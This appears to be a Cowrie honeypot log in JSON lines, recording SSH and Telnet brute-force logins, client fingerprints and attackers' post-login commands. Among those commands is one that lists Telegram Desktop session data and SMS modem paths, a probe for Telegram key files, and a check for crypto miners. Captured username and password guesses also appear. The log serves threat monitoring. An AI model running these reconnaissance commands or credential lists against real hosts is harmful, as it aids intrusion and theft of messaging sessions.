{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:55.929403Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:56.611042Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T01:35:56.612042Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:56.906574Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:57.537341Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-26T01:35:57.538044Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:57.831734Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:58.435975Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-26T01:35:58.436668Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:58.757284Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:59.390134Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-26T01:35:59.390901Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:59.682278Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40530,"dst_ip":"1.2.3.4","dst_port":22,"session":"57c7f3a8a4d9","protocol":"ssh","message":"New connection: 212.227.125.160:40530 (1.2.3.4:22) [session: 57c7f3a8a4d9]","sensor":"my-vps","timestamp":"2025-08-26T01:36:28.551959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:36:28.552772Z","src_ip":"212.227.125.160","session":"57c7f3a8a4d9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:36:28.603364Z","src_ip":"212.227.125.160","session":"57c7f3a8a4d9"}
{"eventid":"cowrie.login.failed","username":"gns3","password":"gns3","message":"login attempt [gns3/gns3] failed","sensor":"my-vps","timestamp":"2025-08-26T01:36:28.757854Z","src_ip":"212.227.125.160","session":"57c7f3a8a4d9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:36:29.828651Z","src_ip":"212.227.125.160","session":"57c7f3a8a4d9"}
{"eventid":"cowrie.session.closed","duration":"48.4","message":"Connection lost after 48.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:36:36.696916Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61966,"dst_ip":"1.2.3.4","dst_port":22,"session":"73dd34c924a6","protocol":"ssh","message":"New connection: 217.72.205.35:61966 (1.2.3.4:22) [session: 73dd34c924a6]","sensor":"my-vps","timestamp":"2025-08-26T01:36:42.118452Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:36:42.119660Z","src_ip":"217.72.205.35","session":"73dd34c924a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16825,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbb98aeba951","protocol":"ssh","message":"New connection: 212.227.235.229:16825 (1.2.3.4:22) [session: dbb98aeba951]","sensor":"my-vps","timestamp":"2025-08-26T01:36:46.155565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T01:36:46.156300Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T01:36:46.260964Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vfkbyf","message":"login attempt [admin/vfkbyf] failed","sensor":"my-vps","timestamp":"2025-08-26T01:36:46.762166Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vasiliy","message":"login attempt [admin/vasiliy] failed","sensor":"my-vps","timestamp":"2025-08-26T01:36:47.868664Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vangogh","message":"login attempt [admin/vangogh] failed","sensor":"my-vps","timestamp":"2025-08-26T01:36:48.975309Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"urlaub","message":"login attempt [admin/urlaub] failed","sensor":"my-vps","timestamp":"2025-08-26T01:36:50.081595Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"twostep","message":"login attempt [admin/twostep] failed","sensor":"my-vps","timestamp":"2025-08-26T01:36:51.188474Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:36:52.295259Z","src_ip":"212.227.235.229","session":"dbb98aeba951"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45145,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfc56cb4b07d","protocol":"telnet","message":"New connection: 212.227.235.229:45145 (1.2.3.4:23) [session: dfc56cb4b07d]","sensor":"my-vps","timestamp":"2025-08-26T01:38:45.026988Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47552,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86c7a508b38","protocol":"ssh","message":"New connection: 212.227.235.229:47552 (1.2.3.4:22) [session: f86c7a508b38]","sensor":"my-vps","timestamp":"2025-08-26T01:38:56.035159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:38:56.613737Z","src_ip":"212.227.235.229","session":"f86c7a508b38"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:38:56.614504Z","src_ip":"212.227.235.229","session":"f86c7a508b38"}
{"eventid":"cowrie.login.success","username":"root","password":"123ewq","message":"login attempt [root/123ewq] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:39:01.170090Z","src_ip":"212.227.235.229","session":"f86c7a508b38"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:39:02.079074Z","src_ip":"212.227.235.229","session":"f86c7a508b38"}
{"eventid":"cowrie.session.closed","duration":30.723567962646484,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:39:15.750479Z","src_ip":"212.227.235.229","session":"dfc56cb4b07d"}
{"eventid":"cowrie.session.connect","src_ip":"210.236.249.126","src_port":39794,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff83a0e14856","protocol":"ssh","message":"New connection: 210.236.249.126:39794 (1.2.3.4:22) [session: ff83a0e14856]","sensor":"my-vps","timestamp":"2025-08-26T01:39:26.435164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:39:26.435810Z","src_ip":"210.236.249.126","session":"ff83a0e14856"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T01:39:26.685839Z","src_ip":"210.236.249.126","session":"ff83a0e14856"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:39:27.440845Z","src_ip":"210.236.249.126","session":"ff83a0e14856"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:39:27.727908Z","src_ip":"210.236.249.126","session":"ff83a0e14856"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65289,"dst_ip":"1.2.3.4","dst_port":22,"session":"2768fb65e022","protocol":"ssh","message":"New connection: 212.227.235.229:65289 (1.2.3.4:22) [session: 2768fb65e022]","sensor":"my-vps","timestamp":"2025-08-26T01:40:37.537417Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-26T01:40:37.538857Z","src_ip":"212.227.235.229","session":"2768fb65e022"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:40:37.539686Z","src_ip":"212.227.235.229","session":"2768fb65e022"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36050,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5558e86d3c9","protocol":"ssh","message":"New connection: 212.227.125.160:36050 (1.2.3.4:22) [session: f5558e86d3c9]","sensor":"my-vps","timestamp":"2025-08-26T01:40:58.884647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:40:58.885793Z","src_ip":"212.227.125.160","session":"f5558e86d3c9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:40:58.944239Z","src_ip":"212.227.125.160","session":"f5558e86d3c9"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana@123","message":"login attempt [solana/solana@123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:40:59.179914Z","src_ip":"212.227.125.160","session":"f5558e86d3c9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:41:00.241951Z","src_ip":"212.227.125.160","session":"f5558e86d3c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41554,"dst_ip":"1.2.3.4","dst_port":22,"session":"96fb11d76f1e","protocol":"ssh","message":"New connection: 212.227.235.229:41554 (1.2.3.4:22) [session: 96fb11d76f1e]","sensor":"my-vps","timestamp":"2025-08-26T01:41:23.078696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:41:24.077079Z","src_ip":"212.227.235.229","session":"96fb11d76f1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:41:24.077758Z","src_ip":"212.227.235.229","session":"96fb11d76f1e"}
{"eventid":"cowrie.login.success","username":"root","password":"Jayesh@123","message":"login attempt [root/Jayesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:41:26.688385Z","src_ip":"212.227.235.229","session":"96fb11d76f1e"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:41:27.193083Z","src_ip":"212.227.235.229","session":"96fb11d76f1e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58406,"dst_ip":"1.2.3.4","dst_port":22,"session":"dba60f2bced3","protocol":"ssh","message":"New connection: 217.72.205.35:58406 (1.2.3.4:22) [session: dba60f2bced3]","sensor":"my-vps","timestamp":"2025-08-26T01:43:24.033091Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:43:24.035298Z","src_ip":"217.72.205.35","session":"dba60f2bced3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56354,"dst_ip":"1.2.3.4","dst_port":23,"session":"e46da713a33e","protocol":"telnet","message":"New connection: 212.227.235.229:56354 (1.2.3.4:23) [session: e46da713a33e]","sensor":"my-vps","timestamp":"2025-08-26T01:43:59.901670Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:44:02.302586Z","src_ip":"212.227.235.229","session":"e46da713a33e"}
{"eventid":"cowrie.session.closed","duration":4.629431962966919,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:44:04.531031Z","src_ip":"212.227.235.229","session":"e46da713a33e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56364,"dst_ip":"1.2.3.4","dst_port":23,"session":"e33b3bd02fd6","protocol":"telnet","message":"New connection: 212.227.235.229:56364 (1.2.3.4:23) [session: e33b3bd02fd6]","sensor":"my-vps","timestamp":"2025-08-26T01:44:04.735805Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:44:06.183059Z","src_ip":"212.227.235.229","session":"e33b3bd02fd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:44:06.198837Z","src_ip":"212.227.235.229","session":"e33b3bd02fd6"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T01:44:06.510539Z","src_ip":"212.227.235.229","session":"e33b3bd02fd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:44:07.606129Z","src_ip":"212.227.235.229","session":"e33b3bd02fd6"}
{"eventid":"cowrie.session.closed","duration":2.873955249786377,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:44:07.609687Z","src_ip":"212.227.235.229","session":"e33b3bd02fd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41676,"dst_ip":"1.2.3.4","dst_port":22,"session":"68644112ba73","protocol":"ssh","message":"New connection: 212.227.125.160:41676 (1.2.3.4:22) [session: 68644112ba73]","sensor":"my-vps","timestamp":"2025-08-26T01:44:35.620124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:44:35.621019Z","src_ip":"212.227.125.160","session":"68644112ba73"}
